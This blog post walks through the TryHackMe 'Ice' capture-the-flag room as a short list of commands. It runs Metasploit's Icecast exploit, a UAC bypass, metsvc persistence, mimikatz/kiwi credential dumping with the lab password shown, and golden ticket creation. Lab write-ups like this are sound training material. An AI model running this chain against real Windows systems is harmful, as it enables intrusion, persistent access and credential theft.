CTF Walk Through - Ice

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

05/12/2024 Shad Hussain Knowledge Views 171 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - Ice - THM


Room Link : https://tryhackme.com/r/room/ice


STEP1
nmap -Pn -sSV 10.10.98.252
FINDING
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http         Icecast streaming media server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
-------------------------------------------------------------------------------------------------------
STEP2
msfconsole -q
search icecast
use exploit(windows/http/icecast_header)
set options and exploit 
bg the session
-------------------------------------------------------------------------------------------------------
STEP3
search exploit suggester
use post(multi/recon/local_exploit_suggester)
set SESSION
and run
-------------------------------------------------------------------------------------------------------
STEP4
USE exploit/windows/local/bypassuac_eventvwr
set SESSION
set LHOST
run
-------------------------------------------------------------------------------------------------------
STEP5
sessions -i 2
getprivs
SeTakeOwnershipPrivilege -- do nothing
ps -- to check processing running
migrate process id to merge with malicious exploit
shell
whoami
nt authority\system -- we are root or admin of the machine
-------------------------------------------------------------------------------------------------------
STEP6 (OPTIONS)
in meterpreter
run metsvc -A -- to keep the persistence even after restart the machine
-------------------------------------------------------------------------------------------------------
STEP7
in meterpreter
load kiwi -- is advance version of mimikatz -- it will also expland help menu
creds_all -- to get all the users and password
FINDING
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)
-------------------------------------------------------------------------------------------------------
STEP8
in meterpreter
golden_ticket_create -- allowing us to authenticate anywhere with ease
dir *.txt /s -- search al .txt files
dir flag* /s /p -- search flag.txt file
dir /s /b flag.txt
-------------------------------------------------------------------------------------------------------

	12.12.2024 Shad Hussain Readers 110
CTF Walk Through - OverlayFS - THM Room Link : https://tryhackme.com/r/room/overlayfs STEP1 Username: overlay ..... Read all...

	06.12.2024 Manorama Kumari Readers 211
*पति की आवश्यकता क्यों ? :: 😊😊 एक महिला एक मनोचिकित्सक के पास गई और उससे बोली कि *"मैं शादी नहीं करना चाहती.. ..... Read all...

	06.12.2024 Shad Hussain Readers 159
CTF Walk Through - DC6 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-6,315/ STEP1 arp-scan -l F ..... Read all...

	05.12.2024 Shad Hussain Readers 185
CTF Walk Through - LazyAdmin - THM Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 ..... Read all...

	04.12.2024 Shad Hussain Readers 188
CTF Walk Through - Vulnversity - THM Room Link : https://tryhackme.com/r/room/vulnversity STEP1 nmap -p- -sSV 10 ..... Read all...

	03.12.2024 Shad Hussain Readers 208
CTF Walk Through - EVM - VulnHub Machien Link : https://www.vulnhub.com/entry/evm-1,391/ step1 : arp-scan ..... Read all...

	02.12.2024 Shad Hussain Readers 208
CTF Walk Through - DC3 - VulnHub Machine Link : https://www.vulnhub.com/entry/dc-32,312/ STEP1 nmap 192.168. ..... Read all...

	01.12.2024 Shad Hussain Readers 264
CTF Walk Through - Cybersploit-1 - Vulnhub machine link : https://www.vulnhub.com/entry/cybersploit-1,506/ step1 : US ..... Read all...

	01.12.2024 Shad Hussain Readers 239
CTF -Walk Through - DeathNote-1 - VulnHub https://www.vulnhub.com/entry/deathnote-1,739/ STEP1 arp-scan -l -- to get ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles